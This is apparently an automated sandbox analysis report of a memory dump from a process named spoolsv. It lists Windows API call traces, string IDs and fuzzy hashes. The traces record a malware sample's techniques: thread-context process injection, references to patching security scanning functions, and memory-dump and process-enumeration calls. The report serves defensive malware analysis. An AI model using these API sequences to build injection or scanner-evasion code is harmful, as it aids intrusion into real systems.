                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                              • Instruction ID: 6262fbca76cb8072c8e2e3ac14519ebcbf17b2491cee8cfd3457233760a87fc4
                                                                              • Opcode Fuzzy Hash: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                              • Instruction Fuzzy Hash: CBE086B53103216FE7105E7D5D407167BD8EB84654F1444B5F54DDB252D260E8188B60
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ABE3,?,?,02B3AC75,00000000,02B3AD51), ref: 02B3A970
                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3A988
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3A99A
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3A9AC
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3A9BE
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3A9D0
                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3A9E2
                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3A9F4
                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3AA06
                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3AA18
                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3AA2A
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3AA3C
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AA4E
                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AA60
                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AA72
                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AA84
                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AA96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                              • API String ID: 667068680-597814768
                                                                              • Opcode ID: 4e7828d299dbc12f59c558d179c735b508e92e8071a981a40cf83eb984af73ea
                                                                              • Instruction ID: a8de1e86de42f05134b81f3a60e823412fa506f13bb9913e2452949a06195e9f
                                                                              • Opcode Fuzzy Hash: 4e7828d299dbc12f59c558d179c735b508e92e8071a981a40cf83eb984af73ea
                                                                              • Instruction Fuzzy Hash: 6231D8B0A91360AFEB12EFA8D885AE637E9EB06740B1009E5B04ADF215E7749815CF51
                                                                              APIs
                                                                                • Part of subcall function 02B38824: LoadLibraryA.KERNEL32(00000000,00000000,02B3890B), ref: 02B38858
                                                                                • Part of subcall function 02B38824: FreeLibrary.KERNEL32(74D80000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,05F5E0FF,00000040,02B8139C,74D80000,00000000,00000000,00000000,00000000,02B3890B), ref: 02B388EB
                                                                              • GetThreadContext.KERNEL32(00000000,02B81420,ScanString,02B813A4,02B3A77C,UacInitialize,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,UacInitialize,02B813A4), ref: 02B39442
                                                                                • Part of subcall function 02B37D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D74
                                                                              • SetThreadContext.KERNEL32(00000000,02B81420,ScanBuffer,02B813A4,02B3A77C,ScanString,02B813A4,02B3A77C,Initialize,02B813A4,02B3A77C,00000000,-00000008,02B814F8,00000004,02B814FC), ref: 02B3A157
                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B81420,ScanBuffer,02B813A4,02B3A77C,ScanString,02B813A4,02B3A77C,Initialize,02B813A4,02B3A77C,00000000,-00000008,02B814F8), ref: 02B3A164
                                                                                • Part of subcall function 02B387A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize,02B813A4,02B3A77C,UacScan), ref: 02B387B4
                                                                                • Part of subcall function 02B387A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387CE
                                                                                • Part of subcall function 02B387A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize), ref: 02B3880A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Thread$ContextFreeLoad$AddressMemoryProcResumeVirtualWrite
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 3455621253-51457883
                                                                              • Opcode ID: e8585673ab2303c9f62c74dff5ba44293d1801885ff68c68c2e959172329f1c4
                                                                              • Instruction ID: 5d80904e685b634a922571d540a3fef8801116da203dbd8c8b88fc35625ce5e1
                                                                              • Opcode Fuzzy Hash: e8585673ab2303c9f62c74dff5ba44293d1801885ff68c68c2e959172329f1c4
                                                                              • Instruction Fuzzy Hash: 0EE2F135A502289FDB12FB64DCD4ADE73BAAF49310F1045E1E14DABA14DE30AE4ACF51
                                                                              APIs
                                                                                • Part of subcall function 02B38824: LoadLibraryA.KERNEL32(00000000,00000000,02B3890B), ref: 02B38858
                                                                                • Part of subcall function 02B38824: FreeLibrary.KERNEL32(74D80000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,05F5E0FF,00000040,02B8139C,74D80000,00000000,00000000,00000000,00000000,02B3890B), ref: 02B388EB
                                                                              • GetThreadContext.KERNEL32(00000000,02B81420,ScanString,02B813A4,02B3A77C,UacInitialize,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,UacInitialize,02B813A4), ref: 02B39442
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Library$ContextFreeLoadThread
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 720575881-51457883
                                                                              • Opcode ID: a1091d61d14678cda9ba7a50783e45eda525329b41f1dbc23ed9ce3d40630be1
                                                                              • Instruction ID: 426d037180404ffe6b50f10745bfba0fbfc13d659e8616499e25edd1c9c24bac
                                                                              • Opcode Fuzzy Hash: a1091d61d14678cda9ba7a50783e45eda525329b41f1dbc23ed9ce3d40630be1
                                                                              • Instruction Fuzzy Hash: F5E2F135A502289FDB12FB64DCD4ADE73BAAF49310F1045E1E14DABA14DE30AE4ACF51
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B258D1
                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B258E8
                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02B25918
                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B2597C
                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B259B2
                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B259C5
                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B259D7
                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B26BD0,02B20000,02B4D790), ref: 02B259E3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B26BD0,02B20000), ref: 02B25A17
                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B26BD0), ref: 02B25A23
                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                              • API String ID: 3245196872-1565342463
                                                                              • Opcode ID: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                              • Instruction ID: ef19b5861f0a776c3709b57b8a60613d9e1f53b3104abb0afcf131cdb76060ab
                                                                              • Opcode Fuzzy Hash: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                              • Instruction Fuzzy Hash: 80415C71D00369AFDB20DAE8CC88ADEB3ADEB09310F4445E5A55DE7242D770DB488F50
                                                                              APIs
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1599918012-2375825460
                                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                              • Instruction ID: 4e7c4795c87d4e92b067478b9e8efea4f613c2413f3a0341889c71a407bfe146
                                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                              • Instruction Fuzzy Hash: 723147B1E5033C6AEB35DAB89C45BEF77AD9B04380F4441E1A64CE6182E6749E8C8F50
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize,02B813A4,02B3A77C,UacScan), ref: 02B387B4
                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387CE
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize), ref: 02B3880A
                                                                                • Part of subcall function 02B37D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D74
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                              • API String ID: 1002360270-4067648912
                                                                              • Opcode ID: 07fcf97a99ee3a6aa31800f43b9427f45d6908b92859ef0c25edcc3d0574ce29
                                                                              • Instruction ID: 3be5c9e1a678c0587999247d3a10623b0e4618c936550ad0917031dfc5cfc97b
                                                                              • Opcode Fuzzy Hash: 07fcf97a99ee3a6aa31800f43b9427f45d6908b92859ef0c25edcc3d0574ce29
                                                                              • Instruction Fuzzy Hash: F1F062B1EA33187EEB11AF6CAC45FB6739CE7863D5F0089A9B10C87540C7705856CB50
                                                                              APIs
                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DB9E), ref: 02B3DB0B
                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB45
                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB72
                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocCloseCreateStringWrite
                                                                              • String ID:
                                                                              • API String ID: 3308905243-0
                                                                              • Opcode ID: 3dcd318551691f1cf31ebc105946344c3e414811ff2a8e68a3f60c51cd78ef7d
                                                                              • Instruction ID: ea693329444560d0910b91d551e8cfdd497cdab07aa6ececfbbb0721085894a0
                                                                              • Opcode Fuzzy Hash: 3dcd318551691f1cf31ebc105946344c3e414811ff2a8e68a3f60c51cd78ef7d
                                                                              • Instruction Fuzzy Hash: 6B21ED71A40319BAEB11EAE4CD46FDEB7BDEB04B00F5045A1B704F75D0D7B06A048AA5
                                                                              APIs
                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA6C
                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DABE), ref: 02B3DA82
                                                                              • NtDeleteFile.NTDLL(?), ref: 02B3DAA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFileInitStringUnicode
                                                                              • String ID:
                                                                              • API String ID: 3559453722-0
                                                                              • Opcode ID: 13f613d322cd672c65c1d9ca7788e916ec27edc242f77f04978a3ca971f64ad3
                                                                              • Instruction ID: f0649e0d32ed293cdce5fc5eb86723b8057f1dc7e04b737bcff1f443ea287b15
                                                                              • Opcode Fuzzy Hash: 13f613d322cd672c65c1d9ca7788e916ec27edc242f77f04978a3ca971f64ad3
                                                                              • Instruction Fuzzy Hash: 0D014F75908349BEEB06EAA08A41BCD77B9AB44704F5004D2E324E7091DA746B088B25
                                                                              APIs
                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA6C
                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DABE), ref: 02B3DA82
                                                                              • NtDeleteFile.NTDLL(?), ref: 02B3DAA1
                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E950), ref: 02B24C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                              • String ID:
                                                                              • API String ID: 2841551397-0
                                                                              • Opcode ID: 790b1224749bd7f52d2e961ca6845c71044e3abda14a5ca9fcb3189edfb4fc98
                                                                              • Instruction ID: 3ff7c5d1a27a9d3004802d3d401e6e3bece05da236d266977e969a5260ae3933
                                                                              • Opcode Fuzzy Hash: 790b1224749bd7f52d2e961ca6845c71044e3abda14a5ca9fcb3189edfb4fc98
                                                                              • Instruction Fuzzy Hash: F001EC71A0430DAAEB15EAE4CE52FDEB3BDEB48700F5045A1E614E2590EB74AB048A64
                                                                              APIs
                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27F7D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1705453755-0
                                                                              • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                              • Instruction ID: 9311d031a8be2f8e861c8ca604ef2a90e916dfa18c5e39a9d79241812cfc996b
                                                                              • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                              • Instruction Fuzzy Hash: D31100B5A00209AF9B04CF99C9809EFF7F9EFC8314B14C569A509EB254E6319A058B90
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A76A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
